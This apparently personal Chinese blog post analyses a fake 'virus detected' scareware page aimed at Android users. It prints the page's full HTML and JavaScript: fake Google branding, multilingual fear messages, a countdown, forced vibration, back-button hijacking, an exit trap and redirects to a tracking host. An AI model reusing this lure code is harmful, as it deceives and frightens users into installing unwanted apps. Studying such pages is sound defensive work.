看完內文之後,第一時間反應是…關掉!我急著看影片
後來覺得有幾點還蠻有趣的
所以,我再度把它打開來研究
先觀察
- 網址(URL)是偽網址,讓人誤以為是Google給你的訊息。結尾的".xyz"域名也太不認真了。(也許是想kuso吧)
- 使用Google的圖片,和 1. 相同的原因
- 時間倒數,故意使人緊張。
- 手機開始會每一秒震動一次,讓你不注意也不行。(這蠻有趣的)
- 內文簡單來說,就是發現手機中有病毒,要你快點去下載APP。(簡中/繁中夾雜,看了就不高興)
這是恐嚇網頁,主要目的是要讓你去下載某個惡意程式,下載並執行之後理所當然地就中毒了
我故意下載看看,是一個APP(*.apk)
檔名我沒去記,因為名字是可以隨便取的
所以這個惡意程式還是得要安裝,並且要使用者給予權限
不過通常也沒人會去注意APP要求什麼權限拉
上網 GOOGLE,在今年5月就有新聞了
當時是會連到 Google play,下載某防毒軟體(我沒有說是像"CM Security"之類的)
我試著照著它流程走,會連到Google play的 SuperB Cleaner(Boost&Clean) 頁面)
Google play基本上算安全,所以這個恐嚇網頁本質上仍是騙你下載,衝流量的
試著玩一下
先在桌機試看看,貼上URL看看
[http://s.system-online-service.xyz/imo/ansapp580061/2/index.htm?models=%2AUNKNOWN&isp=Android+6.0.1&a001=trk.googleplay&b001=trk.yahoo.xyz&c001=trk.loadingcontent.xyz&d001=trk.amazon.xyz]
OK,看來需要在手機上跑才看得到原始碼
在手機Chrome,使用view-source可以得到網頁原始碼
view-source:<url> # 可以得到網頁原始碼
原始碼為
<html><head>
<script>
var suffixurl = (location.search.length > 0 ? location.search.substring(1) : "");
function getURLParameter(name) {
return decodeURI(
(RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
);
}
if(getURLParameter('isp') == "" || typeof getURLParameter('isp') == 'undefined')
{
document.location.replace("index.htm?" + suffixurl);
}
if(typeof window.orientation == 'undefined')
{
document.location.replace("index.htm?" + suffixurl);
}
</script>
<script>
function getURLExtParameter(name, replaceisp='isp'){
var models = getURLParameter(name);
if(!models || models.toLowerCase().indexOf("unknow") >= 0){
models = getURLParameter(replaceisp);
}
if(models)
models = decodeURIComponent(models).replace(/\+/g, ' ');
return models;
}
</script>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0,maximum-scale=1.0, user-scalable=no">
<title>Google</title>
<link rel="icon" href="logo11.png">
<style type="text/css">
a {
color: #585858;
}
body {
background-color: #fff;
color: #646464;
margin: 0;
line-height:150%;
}
h1 {
color: #000;
font-size: 1.4em;
}
.hidden {
display: none;
}
html {
-webkit-text-size-adjust: 100%;
font-size: 125%;
}
.interstitial-wrapper {
padding-top: 20px;
box-sizing: border-box;
font-size: 1em;
margin: auto;
max-width: 600px;
width: 90%;
}
h1 {
margin-top: 10px;
}
a {
color: rgb(17,85,204);
text-decoration: none;
}
#blink {
color: #ff0000;
padding-bottom: 2px;
padding-top: 10px;
-webkit-animation: blink 1s infinite;
-moz-animation: blink 1s infinite;
-ms-animation: blink 1s infinite;
-o-animation: blink 1s infinite;
animation: blink 1s infinite;
}
@-webkit-keyframes blink {
0% {
opacity: 1.0;
}
50% {
opacity: 0.0;
}
100% {
opacity: 1.0;
}
}
@-moz-keyframes blink {
0% {
opacity: 1.0;
}
50% {
opacity: 0.0;
}
100% {
opacity: 1.0;
}
}
@-ms-keyframes blink {
0% {
opacity: 1.0;
}
50% {
opacity: 0.0;
}
100% {
opacity: 1.0;
}
}
}
@-o-keyframes blink {
0% {
opacity: 1.0;
}
50% {
opacity: 0.0;
}
100% {
opacity: 1.0;
}
}
@keyframes blink {
0% {
opacity: 1.0;
}
50% {
opacity: 0.0;
}
100% {
opacity: 1.0;
}
}
</style>
</head>
<body onload="translate()" class="offline" style="font-family: Helvetica, sans-serif; font-size: 75%;">
<div id="main-frame-error" class="interstitial-wrapper">
<div id="main-content">
<image overflow="visible" width="150" height="53" src="logo.png"></image>
<div id="today"></div>
<div id="main-message" style="clear: both;">
<h1 id="headTxt2" style="">
<span id="headingtext"><script>document.write(getURLExtParameter('models', 'isp'))</script> <div id='blink'><div id="NO1"></div></div></span></h1>
<div id="subhead" style="margin-bottom: 1px; color: black; font-weight: bold;"><div id="NO2"></div></div>
<div id="bodytxt" style="">
<image overflow="visible" width="100" height="104" src="404.png" style="float:right;"></image>
<span style="font-size:18px;font-weight:bold;color:red;font-family:sans-serif;" id="timer"></span>
<div id="successScan" style="margin-bottom:8px"></div>
<div id="NO3"></div> <br> </div>
</div>
</div>
<div id="details" class="" jstcache="0">
<div jsselect="summary" jstcache="5">
<span style="text-align:center;display:block;">
<a id="NO4" href="" style="box-sizing: border-box;padding:10px 15px;color:#fff;border-radius:3px;width: 100%;display: block;background: #0370ea;
background: -moz-linear-gradient(top,#008dfd 0,#0370ea 100%);
background: -webkit-gradient(linear,left top,left bottom,color-stop(0,#008dfd),color-stop(100%,#0370ea));
background: -webkit-linear-gradient(top,#008dfd 0,#0370ea 100%);
background: -o-linear-gradient(top,#008dfd 0,#0370ea 100%);
background: -ms-linear-gradient(top,#008dfd 0,#0370ea 100%);
background: linear-gradient(top,#008dfd 0,#0370ea 100%);" rel="noreferrer"></a>
</span>
</div>
<div style="text-align:center;margin:0 auto;margin-top:20px;"><a id="NO404" href="" rel="noreferrer"><img src="googleplaylogo.png" border="0"></a></div>
</div>
</div>
<br>
<div id="musicplace"><audio id="music" autoplay="autoplay" loop="loop">
<source src="alert.mp3" type="audio/mpeg">
<source src="alert.oga" type="audio/mpeg">
</audio>
</div>
<script type="text/javascript">document.getElementById("NO4").href="http://"+getURLParameter('c001')+"/go.php";</script>
<script type="text/javascript">document.getElementById("NO404").href="http://"+getURLParameter('c001')+"/go.php";</script>
<script type="text/javascript" src="language.js"></script>
<script type="text/javascript">
! function () {
var t;
try {
for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
onpopstate = function (t) {
t.state && location.replace("http://"+getURLParameter('c001')+"/go.php");
}
} catch (o) {}
}();
</script>
</body></html>
可以看一下language.js
[http://s.system-online-service.xyz/imo/ansapp580061/2/language.js]
setTimeout ('changeLanguage()',1);
setTimeout ('pausemusic()',1400);
setTimeout ('showAlert()',825);
setTimeout ('pausetime()',90000);
function pausemusic(){
document.getElementById('musicplace').innerHTML = '';
}
function pausetime(){
document.getElementById('timer').style.display = 'none';
}
function changeLanguage()
{
var type=navigator.appName
if (type=="Netscape"){
var lang = navigator.language
}
else{
var lang = navigator.userLanguage
}
var lang = lang.substr(0,2)
if (lang == "zh"){
document.getElementById('NO1').innerHTML = '您的手機發現 (22) 個病毒!';
document.getElementById('NO2').innerHTML = '這些手機病毒即將損壞您的電池.為了您的設備安全,系統將永久關機.<br><br>';
document.getElementById('NO3').innerHTML = '<strong>請立即按下列步驟清除病毒:</strong><br><strong>第一步:</strong> 點擊"刪除病毒",到Google Play下載官方免費殺毒APP.<br><strong>第二步:</strong> 打開APP,清除電池病毒並恢復系統運行速度.';
document.getElementById('NO4').innerHTML = '刪除病毒';
}
else if (lang == "ms"){
document.getElementById('NO1').innerHTML = 'Amaran!';
document.getElementById('NO2').innerHTML = 'Telefon anda mempunyai (2) Virus dan baterinya telah rosak!<br><br>';
document.getElementById('NO3').innerHTML = '<strong>Bagaimana membaiki bateri anda:</strong><br><strong>Langkah 1:</strong>Ketik butang di bawah dan pergi ke Google Play Store untuk memasang aplikasi alih keluar virus dengan percuma.<br><strong>Langkah 2:</strong>Mengalih keluar semua virus dan membaiki bateri anda.';
document.getElementById('NO4').innerHTML = 'Alih Keluar Virus Sekarang';
}
else if (lang == "de"){
document.getElementById('NO1').innerHTML = 'Ihre Batterie ist stark beschädigt!';
document.getElementById('NO2').innerHTML = 'Wir haben einen Virus auf Ihrem Telefon gefunden! <br>Um einen Komplettverlust zu vermeiden, Muss die Batterie jetzt repariert werden.<br><br>';
document.getElementById('NO3').innerHTML = '<strong>Wie Sie Ihren Akku reparieren:</strong><br><strong>Schritt 1:</strong>Die untenstehende Schaltfläche antippen & auf Google Play Store gehen, um die kostenlose App zu installieren, die zur Virenentfernung empfohlen wird.<br><strong>Schritt 2:</strong>Wöchentlich auf Viren prüfen, Um sicherzustellen, Dass Ihr Telefon virenfrei ist.';
document.getElementById('NO4').innerHTML = 'Den Akkuvirus jetzt entfernen';
}
else if (lang == "it"){
document.getElementById('NO1').innerHTML = 'Avviso di sistema!';
document.getElementById('NO2').innerHTML = 'Sono stati rilevati (2) virus e la batteria è stata infettata e danneggiata.<br><br>';
document.getElementById('NO3').innerHTML = "<strong>Come riparare la batteria:</strong><br><strong>Fase 1:</strong>tocca il pulsante sottostante per accedere al Google Play Store e installare gratuitamente l'applicazione consigliata per la rimozione dei virus.<br><strong>Fase 2:</strong>esegui l'applicazione per rimuovere tutti i virus e riparare la batteria.<br><strong>Fase 3:</strong>Mantieni l'app per almeno 3 giorni per eliminare completamente i virus e prevenire ulteriori attacchi.";
document.getElementById('NO4').innerHTML = 'Rimuovi i virus della batteria ora';
}
else if (lang == "es"){
document.getElementById('NO1').innerHTML = 'El teléfono dispone de (3) Virus!';
document.getElementById('NO2').innerHTML = 'Amenaza de: Backdoor.Battery.OS.Obad.a/.b/.f. Si no eliminas los virus ahora, ocasionará más daños graves a tu móvil.<br><br>';
document.getElementById('NO3').innerHTML = '<strong>Cómo arreglar tu teléfono:</strong><br><strong>Paso 1:</strong>Pulse el botón de abajo y vaya a Google Play para instalar de forma gratuita la aplicación recomendada de eliminación de virus.<br><strong>Paso 2:</strong>Abra la aplicacion para arreglar tu teléfono.<br><strong>Paso 3:</strong>mantén la app mínimo 3 días para borrar completamente todos los virus y prevenir ataques posteriores.';
document.getElementById('NO4').innerHTML = 'Eliminar Virus';
}
else if (lang == "tr"){
document.getElementById('NO1').innerHTML = 'Sistem Uyarısı!';
document.getElementById('NO2').innerHTML = 'cihazınızda (2) virüs bulundu ve pile de bulaşmış ve hasar görmüş!<br><br>';
document.getElementById('NO3').innerHTML = "<strong>Pilinizi nasıl onaracaksınız:</strong><br><strong>Adım 1:</strong>Aşağıdaki düğmeye dokunun ve önerilen virüs silme uygulamasını Google Play Store'dan ücretsiz olarak kurun.<br><strong>Adım 2:</strong>Tüm virüsleri silmek ve pilinizi onarmak için uygulamayı çalıştırın.";
document.getElementById('NO4').innerHTML = 'ŞİMDİ HIZLI REPAIR';
}
else if (lang == "ar"){
document.getElementById('NO1').innerHTML = 'تحذير ';
document.getElementById('NO2').innerHTML = 'جهاز لديك مصاب بفيروس والبطارية تالفة<br><br>';
document.getElementById('NO3').innerHTML = "اضغط على الزر أدناه وانتقل إلى Google Play لتثبيت التطبيق الموصى به لإزالة الفيروسات مجانا<br><br>";
document.getElementById('NO4').innerHTML = 'إزالة فيروس البطارية الآن';
}
else if (lang == "ja"){
document.getElementById('NO1').innerHTML = 'システム警告!';
document.getElementById('NO2').innerHTML = '(22)個のウイルスが検出され、バッテリーが感染して破損していることが分かりました。<br><br>';
document.getElementById('NO3').innerHTML = '<strong>バッテリーの修複方法:</strong><br><strong>ステップ1:</strong> 下のボタンをタップしてGoogle Playストアに移動します。おすすめのウイルス削除アプリを無料でインストールします。<br><strong>ステップ2:</strong> アプリを起動させ、全てのウイルスを削除してバッテリーを修復します。';
document.getElementById('NO4').innerHTML = 'ウイルスを除去';
}
else if (lang == "ko"){
document.getElementById('NO1').innerHTML = '시스템 경고!';
document.getElementById('NO2').innerHTML = '귀하의 휴대 전화는 (2) 바이러스가있다! 에서 검출되었으며 배터리가 감염되었고 손상되었습니다.<br><br>';
document.getElementById('NO3').innerHTML = '<strong>배터리를 복구하는 방법:</strong> <br><strong>1 단계: </strong> 아래 버튼을 누르고 Google Play Store로 이동하여 무료로 권장하는 바이러스 제거 앱을 설치합니다.<br><strong>2 단계: </strong>앱을 실행하여 모든 바이러스를 제거하고 배터리를 복구합니다.<br><strong>3 단계: </strong>모든 바이러스를 완전히 정리하고 추가 공격을 방지하기 위해 최소 3일 동안 앱을 유지하십시오.';
document.getElementById('NO4').innerHTML = '바이러스를 제거';
}
else{
document.getElementById('NO1').innerHTML = 'Warning! (22) Virus Detected!';
document.getElementById('NO2').innerHTML = 'If you do not remove the virus from your device immediately, your battery will be infected and your device will be shut down permanently!<br><br>';
document.getElementById('NO3').innerHTML = '<strong>Here is what you should do immediately:</strong><br><br><strong>Step 1:</strong> Tap the "Remove Battery Virus" button below to install official virus removal App from Google play for Free.<br><strong>Step 2:</strong> Run the app to remove all virus & repair your battery.';
document.getElementById('NO4').innerHTML = 'Remove Battery Virus';
}
}
function showAlert(){
var type=navigator.appName
if (type=="Netscape"){
var lang = navigator.language
}
else{
var lang = navigator.userLanguage
}
var lang = lang.substr(0,2)
if (lang == "zh"){
alert("警告!您的手機發現病毒!\n\n病毒即將損壞您的電池。\n\n請按照說明刪除該病毒");
_showMessage(window, "****************\n\n 警告! \n\n 離開此頁面後果自負! \n\n ****************");
_performEvent(navigator);
}
else if (lang == "ja"){
alert("システム警告!");
_showMessage(window, "****************\n\n手順に従い攜帯を修復してください。\n\n ウィンドウを閉じないでください。\n\n 閉じる場合は自己責任となります! \n\n ****************");
_performEvent(navigator);
}
else if (lang == "ko"){
alert("시스템 경고!");
_showMessage(window, "****************\n\n 휴대폰을 수정하기 위해 지침을 계속합니다. 이 창을 닫지 마십시오.\n\n 자체 위험에서 종료.****************");
_performEvent(navigator);
}
else if (lang == "ms"){
alert("Amaran!");
_showMessage(window, "****************\n\n Amaran! \n\n Jika anda keluar daripada aplikasi,\n\n anda perlu menanggung semua risiko. \n\n ****************");
_performEvent(navigator);
}
else if (lang == "de"){
alert("System warnung!");
_showMessage(window, "****************\n\n Systemwarnung! \n\n Fahren Sie mit den Anweisungen fort, um das Telefon zu reparieren. Schließen Sie dieses Fenster nicht.\n\n Beenden auf eigene Gefahr.\n\n****************");
_performEvent(navigator);
}
else if (lang == "it"){
alert("Avviso di sistema!");
_showMessage(window, "****************Avviso di sistema! \n\n Segui le istruzioni per riparare il telefono. Non chiudere questa finestra.\n\n Esci a tuo rischio e pericolo!****************");
_performEvent(navigator);
}
else if (lang == "es"){
alert("Advertencia!");
_showMessage(window, "****************\n\n Advertencia! \n\n Continua con las instrucciones para arregular tu telefono. \n\n No cierres la ventana.\n\n****************");
_performEvent(navigator);
}
else if (lang == "tr"){
alert("Sistem Uyarısı!");
_showMessage(window, "****************\n\n Sistem Uyarısı!\n\n Telefonu düzeltmek için talimatları izleyin.\n\n Bu pencereyi kapatmayın.\n\n Çıkmanın riski size aittir! \n\n ****************");
_performEvent(navigator);
}
else if (lang == "ar"){
alert("تحذير! ");
_showMessage(window, "****************\n\n تحذير! \n\n يرجى مواصلة التعليمات لإصلاح الهاتف. لا تغلق هذه النافذة \n\n ****************");
_performEvent(navigator);
}
else {
alert("WARNING! Virus detected! \n\n Please follow the instructions to remove the Virus.");
_showMessage(window, "****************\n\nWARNING! Virus detected!\n\n Please follow the instructions to remove the Virus! \n\n Exit at your own risk!\n\n ****************");
_performEvent(navigator);
}
}
//timer script
var sec = 29; // set the seconds
var min = 01; // set the minutes
function countDown() {
sec--;
if (sec == -01) {
sec = 59;
min = min - 1;
} else {
min = min;
}
if (sec<=9) { sec = "0" + sec; }
time = (min<=9 ? "0" + min : min) + " : " + sec;
if (document.getElementById) { document.getElementById('timer').innerHTML = time; }
SD=window.setTimeout("countDown();", 1000);
if (min == '00' && sec == '00') { sec = "00"; window.clearTimeout(SD); }
}
window.onload = countDown;
function _showMessage(e, t){
function n(){for(var e=document.getElementsByTagName("meta"),t=0;t<e.length;++t)if(-1!==e[t].httpEquiv.search(/refresh/i)){var n=e[t].content.match(/\d+/);if(n)return 1e3*parseInt(n[0])}return!1}var a,r=(new Date).valueOf();document.onclick=function(e){try{var t=e?e.target:event.srcElement;"a"===t.tagName.toLowerCase()&&(a=!0)}catch(n){a=!0}},e.onbeforeunload=function(c){var o=n();if(o!==!1){var i=(new Date).valueOf()-r;if(Math.abs(i-o)<500)return}return a||e._clicked?void 0:t}
}
function _performEvent(e){
try{var a=e.vibrate||e.webkitVibrate||e.mozVibrate||e.msVibrate;a&&a.call(e,[666,333,666,333,666,333,666,333,666,333,666,333,666,333])}catch(t){}
}
OK,其實我花這麼久時間,只要想找手機震動的方法是什麼而已XD
有興趣的人可以去查查 navigator.vibrate
對了,如果點button之後
會導向URL [http://trk.loadingcontent.xyz/go.php]
內容應該是再導頁到其它URL
@update 2016/12/16
昨天跳出一個新頁面出來時,本能反應要拉下來、關掉時,看見
然後,沒過多久就又看見全新風格的頁面
只是這次沒有掛 google名字XD
忘了截圖,SAD
沒有留言:
張貼留言